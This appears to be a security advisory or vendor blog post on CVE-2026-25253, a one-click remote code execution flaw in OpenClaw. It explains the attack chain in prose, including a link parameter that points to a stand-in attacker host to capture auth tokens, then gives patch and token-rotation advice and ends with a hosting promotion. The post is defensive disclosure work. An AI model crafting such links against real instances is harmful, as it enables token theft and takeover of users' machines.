CVE-2026-25253: One-Click RCE in OpenClaw and What You Should Know

A single malicious link. That is all it takes to get full command execution on an unpatched OpenClaw instance. CVE-2026-25253 landed on the NVD on February 1, 2026, carrying a CVSS score of 8.8 (HIGH). Security researcher Mav Levin at DepthFirst discovered the flaw, and Belgium's CCB issued a "Patch Immediately" advisory shortly after.

With 149,000+ GitHub stars and an estimated 42,665 publicly exposed instances, this is not a niche problem.

How the Attack Works

The exploit chains four steps. All of them happen in milliseconds.

1. The attacker sends the victim a link containing ?gatewayUrl=attacker.com/ws.
2. OpenClaw's Control UI reads that URL parameter and auto-connects, forwarding the auth token to the attacker's server.
3. The attacker uses the stolen token to connect back via WebSocket. Browsers do not enforce same-origin policy on WebSocket connections, so this works without any warning.
4. With a valid token in hand, the attacker disables safety features and runs arbitrary commands on the host machine.

The scary part? Even localhost-bound instances are vulnerable. Your browser runs on the same machine, so it can reach localhost:18789 just fine. The attacker never needs direct network access to your server. Your own browser is the bridge.

The Numbers Are Bad

BitSight detected 18,000+ publicly reachable OpenClaw instances within 48 hours of disclosure. A broader scan found 42,665 exposed instances, with 5,194 actively verified as vulnerable.

Think about what a typical OpenClaw instance has access to. iMessage and WhatsApp integrations. Slack channels. Stripe API keys. Auth tokens. Source code. One click, and all of that is exposed.

The Fix

OpenClaw v2026.1.29, released January 30, 2026, added a gateway URL confirmation modal. The UI no longer silently connects to whatever URL a query parameter tells it to.

If you run OpenClaw yourself, update to v2026.1.29 or later right now. Then rotate your auth tokens and any API keys your instance can access. Assume they were compromised if you were running an older version with an exposed port.

ClawHosters Customers Were Not Affected

If you run your OpenClaw instance through ClawHosters managed hosting plans, you were already protected before this CVE went public. Our security architecture means managed instances get automatic updates, the gateway is never exposed directly to browser traffic, and container isolation prevents lateral movement even if something does go wrong.

For a deeper look at the protections we apply by default, check our security hardening guide and the built-in safety scanner that ships with every instance.